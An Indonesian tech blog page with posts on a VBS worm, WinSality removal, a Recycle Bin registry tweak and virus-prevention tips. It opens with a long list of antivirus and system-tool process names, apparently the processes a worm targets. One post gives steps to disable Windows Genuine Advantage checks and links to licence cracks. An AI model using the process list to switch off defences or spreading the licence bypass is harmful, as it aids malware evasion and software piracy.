ldpro.exe, ldpromenu.exe, ldscan.exe, licmgr.exe, localnet.exe, lockdown.exe, lockdown2000.exe, lookout.exe, lsetup.exe, luall.exe, luau.exe, lucomserver.exe, luinit.exe, luspt.exe, mbam.exe, mbamgui.exe, mbamservice.exe, mcagent.exe, mcmnhdlr.exe, mcshield.exe, mctool.exe, mcuimgr.exe, mcupdate.exe, mcvsrte.exe, mcvsshld.exe, mdll.exe, mfw2en.exe, mfweng3.02d30.exe, mgavrtcl.exe, mgavrte.exe, mghtml.exe, mgui.exe, minilog.exe, monitor.exe, monsys32.exe, monsysnt.exe, monwow.exe, moolive.exe, mpfagent.exe, mpfservice.exe, mpftray.exe, mrflux.exe, MSASCui.exe, msblast.exe, msconfig.exe, msinfo32.exe, msn.exe, mspatch.exe, mssmmc32.exe, mu0311ad.exe, mwatch.exe, mxtask.exe, n32scan.exe, n32scanw.exe, nai_vs_stat.exe, nav32_loader.exe, nav80try.exe, navap.exe, navapsvc.exe, navapw32.exe, navauto-protect.exe, navdx.exe, naveng.exe, navengnavex15.exe, navex15.exe, navlu32.exe, navnt.exe, navrunr.exe, navsched.exe, navstub.exe, navw.exe, navw32.exe, navwnt.exe, nc2000.exe, ncinst4.exe, nd98spst.exe, ndd32.exe, ndntspst.exe, neomonitor.exe, neowatchlog.exe, netarmor.exe, netcfg.exe, netinfo.exe, netmon.exe, netscanpro.exe, Netscape.exe, netspyhunter-1.2.exe, netstat.exe, netutils.exe, nisserv.exe, nisum.exe, nmain.exe, nod32.exe, normist.exe, norton_internet_secu_3.0_407.exe, notstart.exe, npf40_tw_98_nt_me_2k.exe, npfmessenger.exe, nprotect.exe, npscheck.exe, npssvc.exe, nsched32.exe, ntdetect.exe, ntrtscan.exe, ntxconfig.exe, nui.exe, nupdate.exe, nupgrade.exe, nvapsvc.exe, nvarch16.exe, nvc95.exe, nvlaunch.exe, nvsvc32.exe, nwinst4.exe, nwservice.exe, nwtool16.exe, offguard.exe, ogrc.exe, opera.exe, Opera_964_int_Setup.exe, ostronet.exe, outpost.exe, outpostinstall.exe, outpostproinstall.exe, padmin.exe, panixk.exe, pathping.exe, pavcl.exe, pavproxy.exe, pavsched.exe, pavw.exe, pcc2002s902.exe, pcc2k_76_1436.exe, pccclient.exe, pccguide.exe, pcciomon.exe, pccmain.exe, pccntmon.exe, pccpfw.exe, pccwin97.exe, pccwin98.exe, pcdsetup.exe, pcfwallicon.exe, pcip10117_0.exe, pcscan.exe, pcscanpdsetup.exe, penis32.exe, periscope.exe, persfw.exe, perswf.exe, pf2.exe, pfwadmin.exe, ping.exe, pingscan.exe, platin.exe, pop3trap.exe, poproxy.exe, popscan.exe, portdetective.exe, portmon.exe, portmonitor.exe, ppinupdt.exe, pptbc.exe, ppvstop.exe, prckiller.exe, Process.exe, processmonitor.exe, procexp.exe, procexplorerv1.0.exe, Procmon.exe, programauditor.exe, proport.exe, protectx.exe, pspf.exe, purge.exe, pview.exe, pview95.exe, qconsole.exe, qserver.exe, rapapp.exe, rav.exe, rav7.exe, rav7win.exe, rav8win32eng.exe, realmon.exe, regedit.exe, regedt32.exe, Regmon.exe, rescue.exe, rescue32.exe, Restart.exe, route.exe, routemon.exe, rrguard.exe, rshell.exe, rstrui.exe, rtvscn95.exe, rulaunch.exe, Safari.exe, safeweb.exe, SandboxieBITS.exe, SandboxieCrypto.exe, SandboxieDcomLaunch.exe, SandboxieRpcSs.exe, SandboxieWUAU.exe, SbieCtrl.exe, SbieSvc.exe, sbserv.exe, scan32.exe, scan95.exe, scanpm.exe, sched.exe, schedapp.exe, scrscan.exe, scvhosl.exe, sd.exe, sdclt.exe, serv95.exe, setupvameeval.exe, setup_flowprotector_us.exe, sgssfw32.exe, sh.exe, sharedaccess.exe, shellspyinstall.exe, shn.exe, smc.exe, SmitfraudFix.exe, sofi.exe, spf.exe, sphinx.exe, spider.exe, spysweeper.exe, spyxx.exe, SrchSTS.exe, srwatch.exe, ss3edit.exe, st2.exe, supftrl.exe, supporter5.exe, sweep.exe, sweep95.exe, sweepnet.exe, sweepsrv.sys.exe, swnetsup.exe, swsc.exe, swxcacls.exe, symproxysvc.exe, symtray.exe, sysdoc32.exe, syshelp.exe, taskkill.exe, tasklist.exe, taskmgr.exe, taskmon.exe, taumon.exe, tauscan.exe, tbscan.exe, tc.exe, tca.exe, tcm.exe, tcpsvs32.exe, tds-3.exe, tds2-98.exe, tds2-nt.exe, tds2.exe, tfak.exe, tfak5.exe, tftpd.exe, tgbob.exe, titanin.exe, titaninxp.exe, tmlisten.exe, tmntsrv.exe, tracerpt.exe, tracert.exe, trjscan.exe, trjsetup.exe, trojantrap3.exe, UCCLSID.exe, UI0Detect.exe, undoboot.exe, unzip.exe, update.exe, updater.exe, UserAccountControlSettings.exe, VACFix.exe, vbcmserv.exe, vbcons.exe, vbust.exe, vbwin9x.exe, vbwinntw.exe, vccmserv.exe, vcleaner.exe, vcontrol.exe, vcsetup.exe, vet32.exe, vet95.exe, vet98.exe, vettray.exe, vfsetup.exe, vir-help.exe, virusmdpersonalfirewall.exe, vmsrvc.exe, vnlan300.exe, vnpc3000.exe, vpc32.exe, vpc42.exe, vpcmap.exe, vpfw30s.exe, vptray.exe, vscan.exe, vscan40.exe, vscenu6.02d30.exe, vsched.exe, vsecomr.exe, vshwin32.exe, vsisetup.exe, vsmain.exe, vsmon.exe, vsscan40.exe, vsstat.exe, vswin9xe.exe, vswinntse.exe, vswinperse.exe, vvstat.exe, w32dsm89.exe, w9x.exe, watchdog.exe, webscan.exe, webscanx.exe, webtrap.exe, WerFault.exe, wfindv32.exe, wgfe95.exe, whoswatchingme.exe, wimmun32.exe, wingate.exe, winhlpp32.exe, wink.exe, winmgm32.exe, winppr32.exe, winrecon.exe, winroute.exe, winservices.exe, winsfcm.exe, wmias.exe, wmiav.exe, wnt.exe, wradmin.exe, wrctrl.exe, WS2Fix.exe, wsbgate.exe, wuauclt.exe, wyvernworksfirewall.exe, xpf202en.exe, xscan.exe, zapro.exe, zapsetup3001.exe, zatutor.exe, zatutorzauinst.exe, zauinst.exe, zlh.exe, zonalarm.exe, zonalm2601.exe, zonealarm.exe, _avp.exe, _avp32.exe, _avpcc.exe, _avpm.exe, _findviru.exe

http://virusindonesia.com/2010/11/16/vb-shortcut-winlogon-virus-shortcut-yang-semakin-canggih/
10. Aisyalam.vbs.
Aisyalam.vbs
Worm tipe VBScript yang dibuat dengan sangat rapi tanpa di-enkripsi ini sama seperti hasil edit dari beberapa worm VBS. Aisyalam.vbs membuat 4 file di tiap drive, Ibab-AisyalaM.Iat, autoruN.inF, Mp3-AisyalaM.mp3, dan desktOp.ini. Tidak ada system yang di disable, hanya perbedaan pada tampilan Windows seperti, icon pada start menu yang berubah menjadi besar, dan warna dasar windows yang berubah menjadi hijau muda (default putih).

Sumber : virusindonesia.com
Posted on 9:37 PM / 2 comments / Read More

Cara membasmi virus WinSality

Ulah WinSality ini memang cukup merepotkan. Dilansir dari informasi vendor penyedia jasa antivirus mereka bahkan melansir bahwa virus WinSality memiliki beberapa varian. Varian-varian tersebut ada yang bersifat polymorphic maupun yang metamorphic. Karena kalau hanya sekedar menggandakan file ataupun bikin PC kita lemot itu mah sudah biasa. Namun apa yang dikerjakan Winsality tidak hanya merusak file-file root windows yang ada dalam C: namun semua file yang berekstensi *.exe yang ada pada semua drive juga akan terinfeksi oleh Winsality. Program-program aplikasi yang sudah terinstall sudah tidak berjalan normal sebagaimana seharusnya. Celakanya lagi apabila kita menyimpan file-file master aplikasi dimanapun drivenya maka besar kemungkinan akan turut terinfeksi juga. Dengan demikian apabila antivirus yang kita pakai berhasil detect bahwa file tersebut sudah terinfeksi dengan WinSality maka seperti kebanyakan antivirus mereka akan langsung menghapusnya dari drive kita. Meskipun tak jarang ditemui kejadian bahkan antivirus yang terinstall sudah tidak bekerja seperti biasanya.  Nah lho… lalu bagaimana dengan nasib beberapa file master aplikasi kita yang berharga :’(

Benar-benar merepotkan bukan??? Bahkan sangat merepotkan bin menjengkelkan !!!

Setelah belajar dari pengalaman juga cari informasi sana sini ternyata ada beberapa cara efektif dalam mengatasi virus Winsality ini. Untungnya lagi beberapa vendor antivirus ternama sudah mengeluarkan tools yang khusus bekerja melakukan remove pada Winsality sampai pada akar-akarnya(Tools AVG Winsality Remover download di sini ). Berikut langkah-langkahnya yang bisa dilakukan untuk menembuhkan PC yang terkena Winsality :

- Putuskan semua koneksi internet dari PC yang terinfeksi Winsality.

- Matikan System restore pada windows.

- Matikan Autorun dan default share dari PC tersebut.

- Matikan semua program aplikasi yang sedang anda buka, termasuk juga program aplikasi yang ada pada   proses startup agar proses removing Winsality berjalan lebih cepat.

- Ubahlah tools Winsality remover yang akan digunakan dari berekstensi *.exe menjadi *.cmd agar tidak terinfeksi oleh Winsality yang sudah menjalar kemana-mana.

- Lakukan scan dengan menggunakan tools tersebut.

- Restart Windows setelah proses cleaning selesai.

- Lakukan perbaikan pada registry windows yang sudah terinfeksi Winsality dengan menggunakan FixReg (download di sini).

- Extrack FixReg.rar dan jalankan registri yang ada di folder FixReg
sesuai dengan windows yang digunakan.

- Restart Windows kembali.

Periksa task manager,  regedit dsb untuk memastikan PC sudah benar-benar bersih dari WinSality.
Semoga bermanfaat =)
Posted on 12:26 PM / 1 comments / Read More

Cara Mengatasi Pesan"You may be a victim of software counterfeiting" di Windows


Cukup menjengkelkan memang saat melihat PC kesayangan kita dapat error message "You may be a victim of software counterfeiting" yang isinya bahwa O.S PC kita bukan genuine dari windows (bagi temen-temen pengguna windows neh.. yang laen minggir dulu hehe) Udah diformat mpe berapa kali pas direstart eh.. surat cinta alias error message tadi kembali muncul di pojok kanan bawah desktop.
Apakah perlu diformat ulang lagi???
hadwuwh... mpe berapa kali diformat ulang???
=(
Bahkan setelah author browse kemana-mana ada user juga yang malah sudah mahal-mahal merogoh kocek untuk membeli windows yang original eh.. malah kena juga error message kalau windowsnya bukan original. Nah lho.. yang benar yang mana? hehe
Bukan maksud hati tidak ingin menggunakan yang original dari microsoft di paman Sam sono tapi bukannya kita hidup tuh harus efektif dan efisien juga hemat =P
(tanpa ada maksud menentang Gerakan Anti Pembajakan wkwkwkwkk...)

Beberapa langkah berikut mungkin bisa temen-temen coba untuk menghilangkan message tersebut :

1. Buka Windows Explorer, akses di C:WindowsDownloaded Program Files. Dalam folder ini temukan dah hapus semua file berakhiran .WGA.
2. Masuk Safe Mode dengan menekan tombol F8 saat PC sedang booting.
    Dalam Safe Mode, masuk ke folder berikut ini:
    - C:WindowsSystem32 (ganti nama file wgatray.exe menjadi wgatrayold.exe)
    - C:WindowsSystem32dllcache (ganti nama file wgatray.exe menjadi wgatrayold.exe)
    Keterangan: Dllcache berada dalam folder yang tersembunyi (hidden). Untuk menampilkannya, buka Control Panel > Folder Options, Pilih tab View, temukan checkbox Show Hidden Files and Folders, tandai.

    3. Masih dalam Safe Mode, Masuk Registry Editor:
        -  Klik Start > Run > ketik regedit dalam dialog box akhiri dengan klik [OK].
        -  Dalam Registry Editor, arahkan pada string berikut:
          HKEY_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\WGALOGON

          - Klik Kanan > Export folder WGALOGON (langkah ini perlu dilakukan untuk membackup registry)
          - Setelah seluruh folder selesai diexport, hapus folder WGALOGON tersebut.
          - Restart.
        Kalau masih bandel dan muncul kembali message "You may be a victim of software counterfeiting" kita pakai jurus jitu kita yang kedua. Langkah ini kita akan menggunakan sedikit bantuan software yang akan menghilangkan message tersebut hanya dengan sekali klik saja. Menarik bukan ?!? Pada dasarnya cara kerja dari software tersebut hampir sama dengan langkah-langkah yang telah kita bahas bersama di atas. Hanya saja kita sama sekali tidak perlu repot-repot harus masuk registry windows.
        Sekali lagi "Just by one click!" dan semua beres ^^
        Temen-temen bisa mendownloadnya dan ikuti intruksinya.
        Selamat mencoba...

        Download software crack Vista & XP Genuine
        Ziddu
        Mediafire
        Posted on 11:13 AM / 2 comments / Read More

        Free Download Ebook : Cara Membuat Shortcut Shutdown dan Restart di Desktop

        Dengan membuat shortcut pada desktop proses melakukan shutdown akan semakin cepat. Karena sobat kedai info hanya melakukan sekali klik saja dan pufh… komputer akan langsung shutdown tanpa kita harus repot-repot klik start menu lalu klik lagi tombol shutdown... 
        Penasaran????? Klik aja di sini untuk mendownload ebook ini. Praktis dan mudah untuk di prakatekkan. Cocok sekali bagi pemula dan kita yang mau mengenal windows lebih jauh =)
        Posted on 12:02 PM / 1 comments / Read More

        Cara Mengganti Nama dan Menyembunyikan Recycle Bin di Desktop


        Adakalanya sobat kedai info merasa bosan dengan tampilan desktop yang hanya itu-itu saja. Mulai dari skin dan icon yang sudah di customize menggunakan beberapa program yang banyak beredar. Tapi…. Ahh!!! tetap aja semuanya masih menawarkan itu-itu saja perubahannnya. Nah.. sobat kedai info kali ini bagaimana kalau kita bisa menyematkan nama kita sendiri ke icon recycle bin atau bahkan kita bisa menyembunyikan recycle bin dari desktop kita (tenang-tenang kita masih bisa menampilkannya kembali kok di kemudian hari.

        Di sini kita akan sedikit mengutak-atik registry windows kita. Ya mungkin bagi kita yang masih asing dengan registry??? Apa itu registry? Registry atau registry editor bagi windows ibarat tulang urat syaraf dalam tubuh windows itu sendiri. Kalau kita bisa mengoptimalkannya alhasil laptop/komputer kesayangan kita bisa menjadi mesin yang luar biasa kemampuannya ( ups lebay hehee… map =P) namun hati-hati ya jangan sampai salah perlakuan bisa-bisa malah komputer kesayangan kita malah sakit dan tak bangun kembali ( nah lho… tenang-tenang jangan panik semua pasti ada obatnya ^^!

        Langkah pertama yang perlu dilakukan adalah membuat salinan atau back up registry kita dulu sebelum kita melakukan modifikasi pada registry komputer kita. Langkah-langkahnya :
        - Klik menu [Run] pada start menu
        - Ketik [regedit]
        - Klik menu [File] lalu pilih [Export]
        - Simpan file registry kita di drive yang kita suka dan klik [Save]
        Mudah bukan ? Dari file registry ini dikemudian hari kita bisa menggunakannya apabila terjadi system crash.

        Untuk merubah nama pada recylcle bin tidaklah semudah merubah nama pada shortcut hanya dengan melakukan klik kanan dan merubah namanya pada umumnya. Kita harus menggunakan registry windows untuk melakukannya. Masuklah registry editor melalui menu Run pada start menu seperti pada langkah sebelumnya. Berikut adalah hal yang harus kita lakukan.
        Klik Key : HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
        Jenis Value : String Value
        Nama Value : (Default)
        Data Value : “Kantong Sampah”

        Nah ubahlah nama yang berwarna merah di atas sesuai kehendak kita tanpa tanda petik.
        Untuk menyembunyikan recycle bin setelah masuk pada registry editor ikuti langkah berikut :
        Klik Key : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\{645FF040-5081-101B-9F08-00AA002F954E}
        Hapus Key {645FF040-5081-101B-9F08-00AA002F954E} di atas maka icon shortcut akan hilang dari desktop kita. Untuk memunculkannya kembali kita tinggal menempatkan kembali Key {645FF040-5081-101B-9F08-00AA002F954E} ditempat awalnya dengan membuat key yang baru.

        Selamat mencoba.

        Download posting di atas dengan format pdf klik di sini.




        Posted on 11:50 AM / 0 comments / Read More

        Tips menjaga dan optimalisasi computer dari serangan virus


        Sering kali kita merasa geram “arghhhhhh……..” ato “adduh…. Kena virus deh!”. Padahal besok sudah deadline laporan, skripsi, tugas dan sebagainya. Ya memang sangat menjengkelkan saat-saat komputer kesayangan kita ngadat karena serangan virus yang tidak bermoral, meski  terkadang serangannya hanya berupa nebeng print out welewh2... (emangnya nih printer moyang loe hoohooo =P)
        Meski kita sudah sangat berhati-hati bisa-bisanya si virus tembus juga infeksi komputer kita. Berbagai antivirus juga sudah kita pasang demi mendukung security pada komputer kita, namun apa daya ^^. Sebenarnya kita bisa mencegah jauh-jauh hari kalau kita mengetahui bagaimana dan darimana potensi serangan virus itu berasal. “Bawa payung sebelum hujan” yah itu mungkin istilah yang cocok untuk topik yang sedang kita bicarakan saat ini.
        Beberapa tips dan trik berikut mungkin patut dicoba untuk mencaga komputer anda dari serangan virus yang sporadis (lebay xixixi...). Oke langsung saja daripada banyak omong nti jadi basi lagi hehhee  =D
        1.    Memasang Antivirus
        Memasang antivirus ini sudah lazim dilakukan dan merupakan wajib hukumnya untuk dilakukan demi menjaga sistem keamanan komputer kesayangan kita. Namun pernahkah anda mengeluhkan antivirus anda, misal “wah kurang sakti nih antivirus masak gak detect sama  sekali padahal tadi di komputernya si A detect da virusnya”. Sebenarnya semua jenis antivirus itu baik meski tidak bisa dipungkiri masing-masing brand punya kelebihan dan kekurangan masing-masing. pertimbangan ialah sudah sepantasnya kita memilih yang sesuai dengan kapasitas komputer kita. Benar-benar harus kita pertimbangkan minimum requirement dari antivirus yang kita mau pakai. Jangan sampai udah beli mahal-mahal ternyata sesudah di install eh malah komputer kita malah jadi lemott <apa bedanya ma kena virus kalo malah jadi ngadat kayak kena virus hehe..) . lakukanlah update database virus secara rutin dan scanning secara berkala pada computer kita.

        2.    Mematikan fungsi autorun pada computer
        Langkah ini layak untuk anda coba karena banyak sekali varian virus yang  mmanfaatkan fasilitas plug and play pada OS. Windows. Kalau anda tidak jeli maka tak hayal malah virus yang terinstall pada komputer kesayangan anda. Ada beberapa cara untuk melakukannya antara lain ialah dengan menekan tombol Alt+Shift saat anda menancapkan flashdisk ke komputer anda. Tekan agak lama hingga window autoplay tidak keluar lagi. Cara kedua ialah melalui Pengaturan Konfigurasi di Windows yaitu melalui Group Policy [GPEDIT.MCS], caranya:
        > Klik menu [Start]
        > Klik [Run]
        > Ketik GPEDIT.MSC pada kolom RUN ,lalu OK
        >Setelah muncul layar Group Policy klik User Configuration , pilih Administrative Templates.
        > Pilih System, lalu cari Turn Off Autoplay.
        > Klik kanan pada Turn Off Autoplay, lalu pilih Properties, lalu pilih Disabled.
        > Klik Apply, lalu OK.
        > Restart komputer.
        3.    Hindari browsing situs-situs gituan

        Nah, ini merupakan nasihat yang sangat penting bagi anda yang sampai detik ini masih suka berkunjung ke situs-situs gituan. Selain berdosa anda tidak akan tahu kalau dari situs-situs gituan banyak sekali terpasang link-link jebakan yang berujung pada terdownloadnya file-file malware, trojan, atau worm. Dengan memanfaatkan tingkat antusiasme dari user pada beberapa tulisan-tulisan yang membuat mereka berpikir panjang untuk mengkliknya, pembuat virus akan berlomba-lomba bagaimana agar virus yang sudah mereka buat bisa menginfeksi komputer si korban(user). Jadi saran penulis bertaubatlah dan segera hentikan aktifitas anda yang sering mengakses situs-situs gituan.

        4.    Belilah dan gunakan software yang berlisensi resmi
        Membeli software yang resmi berarti anda telah mensukseskan gerakan anti pembajakan di dunia. Disamping anda akan mendapatkan software yang berlisensi anda juga akan terbebas dari potensi terkena file-file yang bersifat merugikan sistem komputer anda (virus). Karena apabila anda menggunakan produk bajakan biasanya akan disediakan  fake serial number baik yang diperoleh dari generate pada keygen, patching, ataupun cracking yang berpotensi besar terinfeksi file-file merugikan sistem. Kalau emang terpaksa pakai yang tidak berlisensi maka pastikan benar-benar aman buat sistem di komputer anda.

        5.    Hindari kebiasaan copy-paste file yang berlebihan saat anda browsing di warnet.
        Kebiasaan melakukan copy-paste diwarnet ternyata juga berbahaya klu anda tidak waspada. Karena terkadang bagi anda yang suka melakukannya anda tidak akan tahu bahwa isi dari folder atau file compres terisi file-file virus.  Jadi selektiflah sebelum melakukan copy-paste.


        6.    Jaga flashdisk anda dari file-file asing.
        Anda mungkin pernah melihat tiba-tiba saja flasdisk anda penuh dengan file-file baru dimana anda sama sekali tidak pernah merasa memasukkan file-file tersebut kedalam file anda. Kalau begitu “Selamat!!!”  flasdisk anda telah terinfeksi virus hehe… File-file dengan kemasan yang terlihat wajar namun bila anda cukup jeli sebenarnya file tersebut sangatlah tidak wajar. Misalnya terdapat file folder yang berekstensi sebagai program aplikasi (folder.exe). Pada dasarnya file-file virus tersebut tidak akan langsung aktif selama anda tidak mengakses (klik) file tersebut meskipun ada beberapa yang memanfaatkan fasilitas autorun dalam sistem. Oleh karena itu ada baiknya kita menonaktifkan fasilitas autorun dalam sistem seperti yang sudah kita bahas di atas. Sekali lagi si pembuat virus akan memanfaatkan kecerobohan dari user untuk mengklik dan mengaktifkan virus. So, waspadalah !!!


        7.    Browsinglah dengan sehat dan aman.
        Ini mungkin menjadi langkah yang paling ampuh untuk mencegah  dari serangan virus kekomputer anda. Browsinglah dengan sehat dan aman. Ibarat berbelanja sebaiknya anda tahu dengan cermat barang apa saja yan akan anda beli jangan sembrono dan serakah main comot saja. Begitu juga ketika anda browsing lakukan hal serupa dan jangan berlebihan meskipun jiwa petualang anda sangat menggebu-nggebu. Karena bisa-bisa anda malah masuk ke alamat-alamat yang berpotensi besar menyebarkan malware dan kroni-kroninya yang malah merugikan sistem komputer anda.


        Seperti itulah beberapa tips yang bisa anda coba untuk mencegah potensi komputer  anda dari serangan virus. Namun kalau emang terjangkitnya sudah parah, seperti kata slogan yang umum “Jika sakit berlanjut hubungi dokter” jadi serahkanlah pada ahlinya untuk membantu anda. Semoga bermanfaat.

          
        Posted on 12:25 PM / 1 comments / Read More
         
        Copyright © 2011. Kedai Info . All Rights Reserved
        Home | Company Info | Contact Us | Privacy policy | Term of use | Widget | Site map